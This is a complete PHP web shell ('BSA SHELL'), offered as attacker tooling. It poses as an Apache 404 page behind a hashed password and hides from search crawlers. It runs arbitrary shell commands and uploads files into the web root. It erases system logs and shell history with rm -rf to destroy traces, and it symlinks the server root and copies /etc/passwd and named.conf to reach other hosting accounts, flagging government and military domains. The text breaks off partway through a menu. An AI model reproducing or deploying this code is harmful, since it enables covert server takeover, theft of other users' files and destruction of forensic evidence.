404NotCrot RayOcta303

1. <?php
2. /*RayOcta303 .::BSA::. Shell
3. /*Password Default: bsa
4. BSA SHELL v1.0*/
5. session_start();
6. error_reporting(0);
7. set_time_limit(0);
8. @set_magic_quotes_runtime(0);
9. @clearstatcache();
10. @ini_set('error_log',NULL);
11. @ini_set('log_errors',0);
12. @ini_set('max_execution_time',0);
13. @ini_set('output_buffering',0);
14. @ini_set('display_errors', 0);
15.  
16.  
17.  
18.  
19. $auth_pass = "dd43bc4306e23060fd3d63bb661bf837"; // default: bsa
20. $color = "#00ff00";
21. $default_action = 'FilesMan';
22. $default_use_ajax = true;
23. $default_charset = 'UTF-8';
24. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
25. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
26. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
27. header('HTTP/1.0 404 Not Found');
28. exit;
29. }
30. }
31.  
32. function login_shell() {
33. ?>
34. <script language="JavaScript1.2">
35. function ClearError() {return true;}
36. window.onerror = ClearError;
37. </script>
38. <h1>Not Found</h1>
39. <p>The requested URL was not found on this server.</p>
40. <hr>
41. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
42. <style>
43. input { margin:0;background-color:#fff;border:1px solid #fff; }
44. </style>
45. <center>
46. <form method=post>
47. <input type=password name=pass>
48. </form></center> s
49.  
50. <form method="post">
51. <input type="password" name="pass">
52. </form>
53. <?php
54. exit;
55. }
56. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
57. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
58. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
59. else
60. login_shell();
61. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
62. @ob_clean();
63. $file = $_GET['file'];
64. header('Content-Description: File Transfer');
65. header('Content-Type: application/octet-stream');
66. header('Content-Disposition: attachment; filename="'.basename($file).'"');
67. header('Expires: 0');
68. header('Cache-Control: must-revalidate');
69. header('Pragma: public');
70. header('Content-Length: ' . filesize($file));
71. readfile($file);
72. exit;
73. }
74. ?>
75. <html>
76. <head>
77. <title>.::BOY SECURITY ARMY::.</title>
78. <meta name='author' content='BAHARI TROUBLE MAKER'>
79. <meta charset="UTF-8">
80. <style type='text/css'>
81. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
82. #menu{
83. padding:10px;
84. border:1px solid #04BA4C;
85. }
86. #menu a{
87. color:black;
88. background:#04BA4C;
89. padding:5px;
90. margin:0;
91. text-decoration:none;
92.  
93. }
94. #menu a:hover{
95. text-decoration:underline;
96. }
97. html {
98. min-height: 100%;
99. background-color: black;
100. color: white;
101. font-family: 'Ubuntu';
102. font-size: 12px;
103. width: 100%;
104. padding: 0px;
105. -moz-border-radius: 5px;
106. -webkit-border-radius: 5px;
107. border-radius: 5px;
108. }
109. li {
110. display: inline;
111. margin: 5px;
112. padding: 5px;
113. -moz-border-radius: 5px;
114. -webkit-border-radius: 5px;
115. border-radius: 5px;
116. }
117. table, th, td {
118. border-collapse:collapse;
119. font-family: Tahoma, Geneva, sans-serif;
120. background: transparent;
121. font-family: 'Ubuntu';
122. font-size: 13px;
123. -moz-border-radius: 5px;
124. -webkit-border-radius: 5px;
125. border-radius: 5px;
126. }
127. .table_home, .th_home, .td_home {
128. border: 1px solid #ffffff;
129. -moz-border-radius: 5px;
130. -webkit-border-radius: 5px;
131. border-radius: 5px;
132. }
133. th {
134. padding: 10px;
135. }
136. a {
137. color: #ffffff;
138. text-decoration: none;
139. }
140. b {
141. padding: 1px;
142. color: green;
143. text-decoration:
144. none;color: white;
145. font-size:14px;
146. }
147. a:hover {
148. color: purple;
149. text-decoration: underline;
150. }
151. tr:hover {
152. background: #04BA4C;
153. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
154. color: #FFFFFF; TEXT-DECORATION: none;
155. }
156.  
157. input[type=text], input[type=password],input[type=submit] {
158. background: transparent;
159. overflow: hidden;
160. color: #ffffff;
161. border: 1px solid #ffffff;
162. margin: 5px auto;
163. padding-left: 5px;
164. font-family: 'Ubuntu';
165. font-size: 13px;
166. -moz-border-radius: 5px;
167. -webkit-border-radius: 5px;
168. border-radius: 5px;
169. }
170. textarea {
171. overflow: hidden;
172. border: 1px solid #ffffff;
173. width: 100%;
174. height: 400px;
175. padding-left: 5px;
176. margin: 10px auto;
177. resize: none;
178. background: transparent;
179. color: #ffffff;
180. font-family: 'Ubuntu';
181. font-size: 13px;
182. -moz-border-radius: 5px;
183. -webkit-border-radius: 5px;
184. border-radius: 5px;
185. }
186. a:focus, input:focus, textarea:focus {
187. outline: 0;
188. border-color: rgba(82, 168, 236, 0.8);
189. -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
190. -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
191. box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
192.  
193. select {
194. width: 152px;
195. background: #000000;
196. color: lime;
197. border: 1px solid #ffffff;
198. margin: 5px auto;
199. padding-left: 5px;
200. font-family: 'Ubuntu';
201. font-size: 13px;
202. -moz-border-radius: 5px;
203. -webkit-border-radius: 5px;
204. border-radius: 5px;
205. }
206. option:hover {
207. background: lime;
208. color: #000000;
209. }
210.  
211. </style>
212. </head>
213. <?php
214. function w($dir,$perm) {
215. if(!is_writable($dir)) {
216. return "<font color=red>".$perm."</font>";
217. } else {
218. return "<font color=lime>".$perm."</font>";
219. }
220. }
221. function r($dir,$perm) {
222. if(!is_readable($dir)) {
223. return "<font color=red>".$perm."</font>";
224. } else {
225. return "<font color=lime>".$perm."</font>";
226. }
227. }
228. function exe($cmd) {
229. if(function_exists('system')) {
230. @ob_start();
231. @system($cmd);
232. $buff = @ob_get_contents();
233. @ob_end_clean();
234. return $buff;
235. } elseif(function_exists('exec')) {
236. @exec($cmd,$results);
237. $buff = "";
238. foreach($results as $result) {
239. $buff .= $result;
240. } return $buff;
241. } elseif(function_exists('passthru')) {
242. @ob_start();
243. @passthru($cmd);
244. $buff = @ob_get_contents();
245. @ob_end_clean();
246. return $buff;
247. } elseif(function_exists('shell_exec')) {
248. $buff = @shell_exec($cmd);
249. return $buff;
250. }
251. }
252. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
253. $ar0=explode($marqueurDebutLien, $text);
254. $ar1=explode($marqueurFinLien, $ar0[$i]);
255. return trim($ar1[0]);
256. }
257. function perms($file){
258. $perms = fileperms($file);
259. if (($perms & 0xC000) == 0xC000) {
260. // Socket
261. $info = 's';
262. } elseif (($perms & 0xA000) == 0xA000) {
263. // Symbolic Link
264. $info = 'l';
265. } elseif (($perms & 0x8000) == 0x8000) {
266. // Regular
267. $info = '-';
268. } elseif (($perms & 0x6000) == 0x6000) {
269. // Block special
270. $info = 'b';
271. } elseif (($perms & 0x4000) == 0x4000) {
272. // Directory
273. $info = 'd';
274. } elseif (($perms & 0x2000) == 0x2000) {
275. // Character special
276. $info = 'c';
277. } elseif (($perms & 0x1000) == 0x1000) {
278. // FIFO pipe
279. $info = 'p';
280. } else {
281. // Unknown
282. $info = 'u';
283. }
284. // Owner
285. $info .= (($perms & 0x0100) ? 'r' : '-');
286. $info .= (($perms & 0x0080) ? 'w' : '-');
287. $info .= (($perms & 0x0040) ?
288. (($perms & 0x0800) ? 's' : 'x' ) :
289. (($perms & 0x0800) ? 'S' : '-'));
290. // Group
291. $info .= (($perms & 0x0020) ? 'r' : '-');
292. $info .= (($perms & 0x0010) ? 'w' : '-');
293. $info .= (($perms & 0x0008) ?
294. (($perms & 0x0400) ? 's' : 'x' ) :
295. (($perms & 0x0400) ? 'S' : '-'));
296. // World
297. $info .= (($perms & 0x0004) ? 'r' : '-');
298. $info .= (($perms & 0x0002) ? 'w' : '-');
299. $info .= (($perms & 0x0001) ?
300. (($perms & 0x0200) ? 't' : 'x' ) :
301. (($perms & 0x0200) ? 'T' : '-'));
302. return $info;
303. }
304. function hdd($s) {
305. if($s >= 1073741824)
306. return sprintf('%1.2f',$s / 1073741824 ).' GB';
307. elseif($s >= 1048576)
308. return sprintf('%1.2f',$s / 1048576 ) .' MB';
309. elseif($s >= 1024)
310. return sprintf('%1.2f',$s / 1024 ) .' KB';
311. else
312. return $s .' B';
313. }
314. function findit($mytext,$starttag,$endtag) {
315. $posLeft = stripos($mytext,$starttag)+strlen($starttag);
316. $posRight = stripos($mytext,$endtag,$posLeft+1);
317. return substr($mytext,$posLeft,$posRight-$posLeft);
318. }
319. function ambilKata($param, $kata1, $kata2){
320. if(strpos($param, $kata1) === FALSE) return FALSE;
321. if(strpos($param, $kata2) === FALSE) return FALSE;
322. $start = strpos($param, $kata1) + strlen($kata1);
323. $end = strpos($param, $kata2, $start);
324. $return = substr($param, $start, $end - $start);
325. return $return;
326. }
327. function getsource($url) {
328. $curl = curl_init($url);
329. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
330. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
331. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
332. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
333. $content = curl_exec($curl);
334. curl_close($curl);
335. return $content;
336. }
337. function bing($dork) {
338. $npage = 1;
339. $npages = 30000;
340. $allLinks = array();
341. $lll = array();
342. while($npage <= $npages) {
343. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
344. if($x) {
345. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
346. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
347. $npage = $npage + 10;
348. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
349. } else break;
350. }
351. $URLs = array();
352. foreach($allLinks as $url){
353. $exp = explode("/", $url);
354. $URLs[] = $exp[2];
355. }
356. $array = array_filter($URLs);
357. $array = array_unique($array);
358. $sss = count(array_unique($array));
359. foreach($array as $domain) {
360. echo $domain."\n";
361. }
362. }
363. function reverse($url) {
364. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
365. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
366. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
367. curl_setopt($ch, CURLOPT_HEADER, 0);
368. curl_setopt($ch, CURLOPT_POST, 1);
369. $resp = curl_exec($ch);
370. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
371. $array = explode(",,", $resp);
372. unset($array[0]);
373. foreach($array as $lnk) {
374. $lnk = "http://$lnk";
375. $lnk = str_replace(",", "", $lnk);
376. echo $lnk."\n";
377. ob_flush();
378. flush();
379. }
380. curl_close($ch);
381. }
382. if(get_magic_quotes_gpc()) {
383. function idx_ss($array) {
384. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
385. }
386. $_POST = idx_ss($_POST);
387. $_COOKIE = idx_ss($_COOKIE);
388. }
389.  
390. if(isset($_GET['dir'])) {
391. $dir = $_GET['dir'];
392. chdir($dir);
393. } else {
394. $dir = getcwd();
395. }
396. $kernel = php_uname();
397. $ip = gethostbyname($_SERVER['HTTP_HOST']);
398. $dir = str_replace("\\","/",$dir);
399. $scdir = explode("/", $dir);
400. $freespace = hdd(disk_free_space("/"));
401. $total = hdd(disk_total_space("/"));
402. $used = $total - $freespace;
403. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
404. $ds = @ini_get("disable_functions");
405. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>MYSQL</font>" : "<font color=red>MYSQL</font>";
406. $curl = (function_exists('curl_version')) ? "<font color=lime>CURL</font>" : "<font color=red>CURL</font>";
407. $wget = (exe('wget --help')) ? "<font color=lime>WGET</font>" : "<font color=red>WGET</font>";
408. $perl = (exe('perl --help')) ? "<font color=lime>PERL</font>" : "<font color=red>PERL</font>";
409. $python = (exe('python --help')) ? "<font color=lime>PYTHON</font>" : "<font color=red>PYTHON</font>";
410. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
411. if(!function_exists('posix_getegid')) {
412. $user = @get_current_user();
413. $uid = @getmyuid();
414. $gid = @getmygid();
415. $group = "?";
416. } else {
417. $uid = @posix_getpwuid(posix_geteuid());
418. $gid = @posix_getgrgid(posix_getegid());
419. $user = $uid['name'];
420. $uid = $uid['uid'];
421. $group = $gid['name'];
422. $gid = $gid['gid'];
423. }
424. echo "<font color=lime>".$kernel."</font><br>";
425. echo "<font color=lime>".$user."</font> (".$uid.")-<font color=lime>".$group."</font> (".$gid.") | <font color=lime>".$ip. "</font>
426. <a href='http://bing.com/search?q=ip:".$ip."&go=&form=QBLH&filt=all' target=\"_blank\"><font color='lime'>[ Bing Search ]</font></a> <a href='http://zone-h.com/archive/ip=".$ip."' target=\"_blank\"><font color='lime'>[ Zone-H ]</font></a><br>";
427. echo "<font color=lime>Used $used</font> of <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
428. echo "<font color=lime>Safe Mode: $sm | </font>";
429. echo "<font color=lime>Disable Functions</font>: $show_ds<br>";
430. echo "| $mysql | $perl| $python | $wget | $curl |<br>";
431. echo "Current DIR: ";
432. foreach($scdir as $c_dir => $cdir) {
433. echo "<a href='?dir=";
434. for($i = 0; $i <= $c_dir; $i++) {
435. echo $scdir[$i];
436. if($i != $c_dir) {
437. echo "/";
438. }
439. }
440. echo "'>$cdir</a>/";
441. }
442. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
443. echo "<form method='post'>
444. <font style='text-decoration: none;'> ~ $ </font>
445. <input type='text' size='20' height='10' name='cmd'><input type='submit' name='do_cmd' value='X'>
446. </form>";
447. if($_POST['do_cmd']) {
448. echo "<pre>".exe($_POST['cmd'])."</pre>";
449. }
450. if($_POST['upload']) {
451. if($_POST['tipe_upload'] == 'biasa') {
452. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
453. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
454. } else {
455. $act = "<font color=red>failed to upload file</font>";
456. }
457. } else {
458. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
459. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
460. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
461. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
462. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
463. } else {
464. $act = "<font color=red>failed to upload file</font>";
465. }
466. } else {
467. $act = "<font color=red>failed to upload file</font>";
468. }
469. }
470. }
471. echo "
472. <form method='post' enctype='multipart/form-data'>
473. <input type='radio' name='tipe_upload' value='biasa' checked> ".w($dir,"Current")."
474. <input type='radio' name='tipe_upload' value='home_root'> ".w($_SERVER['DOCUMENT_ROOT'],"Home")."
475. <input type='file' name='ix_file'>
476. <input type='submit' value='upload' name='upload'>
477. </form>";
478. echo $act;
479.  
480.  
481. echo"<div id='menu'>";
482. echo "<center>";
483. echo "<a href='?'>Home&nbsp;</a> ";
484. echo "<a href='?dir=$dir&do=server'>Server Infos</a> ";
485. echo "<a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ";
486. echo "<a href='?dir=$dir&do=baipas'>Bypass</a> ";
487. echo "<a href='?dir=$dir&do=tconf'>Config</a> ";
488. echo "<a href='?dir=$dir&do=symlink'>Symlink</a><br><br> ";
489. echo "<a href='?dir=$dir&do=jumping'>Jumping</a> ";
490. echo "<a href='?dir=$dir&do=aeu'>Auto Edit User</a> ";
491. echo "<a href='?dir=$dir&do=brut'>Bruteforce</a> ";
492. echo "<a href='?dir=$dir&do=cgi'>CGI-Telnet</a> ";
493. echo "<a href='?dir=$dir&do=adminer'>Adminer</a> ";
494. echo "<a href='?dir=$dir&do=zoneh'>Zone-H</a> ";
495. echo "<a href='?dir=$dir&do=tool'>Tools</a> ";
496. echo "<a href='?dir=$dir&do=nyungseb'>Delete Logs</a> ";
497. echo "<a style='color: red;' href='?dir=$dir&do=modar'>Kill Shell</a> ";
498. echo "<a style='color: red;' href='?logout=true'>Logout</a> ";
499. echo "</center>";
500. echo "</div>";
501. echo "<br>";
502.  
503. if($_GET['logout'] == true) {
504. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
505. echo "<script>window.location='?';</script>";
506.  
507. }
508. elseif($_GET['do'] == 'modar') {
509. $file = $_SERVER['PHP_SELF'];
510. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
511. die('<br><br><b class="tmp"><font color="#ff0000" size="2pt"><center>Wes Kehapus :"</center></font></b><meta http-equiv="refresh" content="3; url=?".$pwd."" />');
512. else
513. echo '<font color="#fff600" size="2pt">unlink error!</font>';
514. }
515. elseif($_GET['do'] == 'nyungseb') {
516. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Logs Eraser</span><center><br>';
517. //exec function madafuck !
518. echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";
519. exec("rm -rf /tmp/logs");
520. exec("rm -rf /root/.ksh_history");
521. exec("rm -rf /root/.bash_history");
522. exec("rm -rf /root/.bash_logout");
523. exec("rm -rf /usr/local/apache/logs");
524. exec("rm -rf /usr/local/apache/log");
525. exec("rm -rf /var/apache/logs");
526. exec("rm -rf /var/apache/log");
527. exec("rm -rf /var/run/utmp");
528. exec("rm -rf /var/logs");
529. exec("rm -rf /var/log");
530. exec("rm -rf /var/adm");
531. exec("rm -rf /etc/wtmp");
532. exec("rm -rf /etc/utmp");
533. exec("rm -rf $HISTFILE");
534. exec("rm -rf /var/log/lastlog");
535. exec("rm -rf /var/log/wtmp");
536.  
537. //shell_exec function madafuck !
538. shell_exec("rm -rf /tmp/logs");
539. shell_exec("rm -rf /root/.ksh_history");
540. shell_exec("rm -rf /root/.bash_history");
541. shell_exec("rm -rf /root/.bash_logout");
542. shell_exec("rm -rf /usr/local/apache/logs");
543. shell_exec("rm -rf /usr/local/apache/log");
544. shell_exec("rm -rf /var/apache/logs");
545. shell_exec("rm -rf /var/apache/log");
546. shell_exec("rm -rf /var/run/utmp");
547. shell_exec("rm -rf /var/logs");
548. shell_exec("rm -rf /var/log");
549. shell_exec("rm -rf /var/adm");
550. shell_exec("rm -rf /etc/wtmp");
551. shell_exec("rm -rf /etc/utmp");
552. shell_exec("rm -rf $HISTFILE");
553. shell_exec("rm -rf /var/log/lastlog");
554. shell_exec("rm -rf /var/log/wtmp");
555.  
556. //passthru function madafuck !
557. passthru("rm -rf /tmp/logs");
558. passthru("rm -rf /root/.ksh_history");
559. passthru("rm -rf /root/.bash_history");
560. passthru("rm -rf /root/.bash_logout");
561. passthru("rm -rf /usr/local/apache/logs");
562. passthru("rm -rf /usr/local/apache/log");
563. passthru("rm -rf /var/apache/logs");
564. passthru("rm -rf /var/apache/log");
565. passthru("rm -rf /var/run/utmp");
566. passthru("rm -rf /var/logs");
567. passthru("rm -rf /var/log");
568. passthru("rm -rf /var/adm");
569. passthru("rm -rf /etc/wtmp");
570. passthru("rm -rf /etc/utmp");
571. passthru("rm -rf $HISTFILE");
572. passthru("rm -rf /var/log/lastlog");
573. passthru("rm -rf /var/log/wtmp");
574.  
575.  
576. //Let the Mother of Functions To Complete The Task wkwkwkw xD!
577. system("rm -rf /tmp/logs");
578. sleep(2);
579. echo'<br><font color="009900" face="Tahoma, Geneva, sans-serif" style="font-size: 10pt">Deleted [+].../tmp/logs <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif>';
580. sleep(2);
581.  
582. system("rm -rf /root/.bash_history");
583. sleep(2);
584. echo'<p>Deleted [+].../root/.bash_history <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
585.  
586. system("rm -rf /root/.ksh_history");
587. sleep(2);
588. echo'<p>Deleted [+].../root/.ksh_history <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
589.  
590. system("rm -rf /root/.bash_logout");
591. sleep(2);
592. echo'<p>Deleted [+].../root/.bash_logout <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
593.  
594. system("rm -rf /usr/local/apache/logs");
595. sleep(2);
596. echo'<p>Deleted [+].../usr/local/apache/logs <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
597.  
598. system("rm -rf /usr/local/apache/log");
599. sleep(2);
600. echo'<p>Deleted [+].../usr/local/apache/log <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
601.  
602. system("rm -rf /var/apache/logs");
603. sleep(2);
604. echo'<p>Deleted [+].../var/apache/logs <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
605.  
606. system("rm -rf /var/apache/log");
607. sleep(2);
608. echo'<p>Deleted [+].../var/apache/log <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
609.  
610. system("rm -rf /var/run/utmp");
611. sleep(2);
612. echo'<p>Deleted [+].../var/run/utmp <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
613.  
614. system("rm -rf /var/logs");
615. sleep(2);
616. echo'<p>Deleted [+].../var/logs <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
617.  
618. system("rm -rf /var/log");
619. sleep(2);
620. echo'<p>Deleted [+].../var/log <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
621.  
622. system("rm -rf /var/adm");
623. sleep(2);
624. echo'<p>Deleted [+].../var/adm <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
625.  
626. system("rm -rf /etc/wtmp");
627. sleep(2);
628. echo'<p>Deleted [+].../etc/wtmp <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
629.  
630. system("rm -rf /etc/utmp");
631. sleep(2);
632. echo'<p>Deleted [+].../etc/utmp <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
633.  
634. system("rm -rf $HISTFILE");
635. sleep(2);
636. echo'<p>Deleted [+]...$HISTFILE <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
637.  
638. system("rm -rf /var/log/lastlog");
639. sleep(2);
640. echo'<p>Deleted [+].../var/log/lastlog <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
641.  
642. system("rm -rf /var/log/wtmp");
643. sleep(2);
644. echo'<p>Deleted [+].../var/log/wtmp <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
645.  
646. sleep(4);
647.  
648. echo '</font><br><br><p><font color="00bb00" face="Tahoma, Geneva, sans-serif" style="font-size: 10pt">Your Traces Has Been Successfully Erased From the Server';
649. echo"</td></tr></table>";
650.  
651. }
652. elseif($_GET['do'] == 'symlink') {
653. echo "<center>";
654. echo "<ul>";
655. echo "<li> <a href='?dir=$dir&do=sym1'>/var/named Symlink</a> </li>";
656. echo "<li> <a href='?dir=$dir&do=sym2'>/etc/passwd Symlink</a> </li>";
657. echo "<li> <a href='?dir=$dir&do=manjat'>/etc/named.conf Symlink</a> </li>";
658. echo "</ul>";
659. echo "</center>";
660. }
661. elseif($_GET['do'] == 'sym3') {
662. echo "<center>";
663. echo "<ul>";
664. echo "<li> <a href='?dir=$dir&do=sym1'>/var/named Symlink</a> </li>";
665. echo "<li> <a href='?dir=$dir&do=sym2'>/etc/passwd Symlink</a> </li>";
666. echo "<li> <a href='?dir=$dir&do=sym3'>/etc/named.conf Symlink</a> </li>";
667. echo "</ul>";
668. echo "</center>";
669. if ($win) {
670. echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
671. }
672. @mkdir('btm3sym', 0777);
673. $sempak = "Options all
674.  
675. DirectoryIndex btm.html
676.  
677. AddType text/plain .php
678.  
679. AddHandler server-parsed .php
680.  
681. AddType text/plain .html
682.  
683. AddHandler txt .html
684.  
685. Require None
686.  
687. Satisfy Any";
688. $masuk = @fopen('btm3sym/.htaccess', 'w');
689. fwrite($masuk, $sempak);
690. @symlink('/', 'btm3sym/dm.txt');
691. $pg = basename(__FILE__);
692. $read_named_conf = @file('/etc/named.conf');
693. if (!$read_named_conf) {
694. echo "<center><br/><br/><nobr><span class='b9'>Can't Read File etc/named.conf :(</span></nobr><br/><br/>";
695. } else {
696. echo "<center>Symlink based /etc/named.conf<br><br> <table border='3' bordercolor='#FF0000' width='400' cellpadding='1' cellspacing='0'>
697. <td align='center'> <font color='white'> <b>DOMAINS</b></td>
698. <td align='center'> <font color='white'> <b>USERS</b></td>
699. <td align='center'> <font color='white'> <b>SYMLINK</b></td>";
700. foreach ($read_named_conf as $subject) {
701. if (eregi('zone', $subject)) {
702. preg_match_all('#zone"(.*)"#', $subject, $string);
703. flush();
704. if (strlen(trim($string[1][0])) > 2) {
705. $UID = posix_getpwuid(@fileowner('/etc/valiases/' . $string[1][0]));
706. $name = $UID['name'];
707. @symlink('/', 'btm3sym/btm.txt');
708. $name = $string[1][0];
709. $australia = '\.au';
710. $bangladesh = '\.bd';
711. $brazil = '\.br';
712. $malaysia = '\.my';
713. $myanmar = '\.mm';
714. $indonesia = '\.id';
715. $israel = '\.il';
716. $romania = '\.ro';
717. $edu = '\.edu';
718. $gov = '\.gov';
719. $go = '\.go';
720. $gob = '\.gob';
721. $mil = '\.mil';
722. if (eregi("$australia", $string[1][0]) or eregi("$bangladesh", $string[1][0]) or eregi("$brazil", $string[1][0]) or eregi("$malaysia", $string[1][0]) or eregi("$myanmar", $string[1][0]) or eregi("$indonesia", $string[1][0]) or eregi("$israel", $string[1][0]) or eregi("$romania", $string[1][0]) or eregi("$edu", $string[1][0]) or eregi("$gov", $string[1][0]) or eregi("$go", $string[1][0]) or eregi("$gob", $string[1][0]) or eregi("$mil", $string[1][0]) or eregi("$mil2", $string[1][0])) {
723. $name = "<div style=' color:yellow ; text-shadow: 0px 0px 1px red; '>" . $string[1][0] . '</div>';
724. }
725. echo "<tr>
726. <td><a class='dm' target='_blank' href=http://" . $string[1][0] . '/>' . $name . ' </a></center></div></td>
727. <td align=center><font color=white>' . $UID['name'] . "</td>
728. <td align=center><a href='btm3sym/btm.txt/home/" . $UID['name'] . "/public_html/' target='_blank'>Symlink </a></td></tr>";
729. flush();
730. }
731. }
732. }
733. }
734. flush();
735. flush();
736. echo "</tr></table></div></html>";
737.  
738. }
739. elseif($_GET['do'] == 'sym2') {
740. echo "<center>";
741. echo "<ul>";
742. echo "<li> <a href='?dir=$dir&do=sym1'>/var/named Symlink</a> </li>";
743. echo "<li> <a href='?dir=$dir&do=sym2'>/etc/passwd Symlink</a> </li>";
744. echo "<li> <a href='?dir=$dir&do=sym3'>/etc/named.conf Symlink</a> </li>";
745. echo "</ul>";
746. echo "</center>";
747.  
748. if ($win) {
749. echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
750. }
751. @mkdir('btm2sym', 0777);
752. $sempak = "Options all
753.  
754. DirectoryIndex btm.html
755.  
756. AddType text/plain .php
757.  
758. AddHandler server-parsed .php
759.  
760. AddType text/plain .html
761.  
762. AddHandler txt .html
763.  
764. Require None
765.  
766. Satisfy Any";
767. $masuk = @fopen('btm2sym/.htaccess', 'w');
768. fwrite($masuk, $sempak);
769. @symlink('/', 'btm2sym/btm.txt');
770. $pg = basename(__FILE__);
771. if (is_readable("/etc/passwd-")) {
772. $gelartiker = 'file_get_contents';
773. $seret = '/etc/passwd-';
774. $isikarung = $gelartiker($seret);
775. $buka = fopen('maho.txt', 'w');
776. fwrite($buka, $isikarung);
777. }
778. if (isset($_GET['file']) or @filesize('maho.txt') > 0) {
779. $cont = stripcslashes($_POST['file']);
780. if (!file_exists('maho.txt')) {
781. $f = @fopen('maho.txt', 'w');
782. $w = @fwrite($f, $cont);
783. fclose($f);
784. }
785. if ($w or @filesize('maho.txt') > 0) {
786. echo "<center>Symlink based /etc/passwd <br><br><table align='center' border='3' width='400' cellspacing='0' cellpadding='0'>
787. <td align='center'> <font color='white'> <b>USERS</b></td>
788. <td align='center'> <font color='white'> <b>SYMLINK</b></td>";
789. flush();
790. $fil3 = file('maho.txt');
791. foreach ($fil3 as $f) {
792. $u = explode(':', $f);
793. $user = $u['0'];
794. echo "<tr>
795. <td align='center'><font color='white'>$user</td>
796. <td align='center'><a class='dm' href='btm2sym/btm.txt/home/$user/public_html' target='_blank'>Symlink</a></td></tr>";
797. flush();
798. flush();
799. }
800. echo "</tr></table></div></html>";
801. }
802. }
803. }
804. elseif($_GET['do'] == 'sym1') {
805. echo "<center>";
806. echo "<ul>";
807. echo "<li> <a href='?dir=$dir&do=sym1'>/var/named Symlink</a> </li>";
808. echo "<li> <a href='?dir=$dir&do=sym2'>/etc/passwd Symlink</a> </li>";
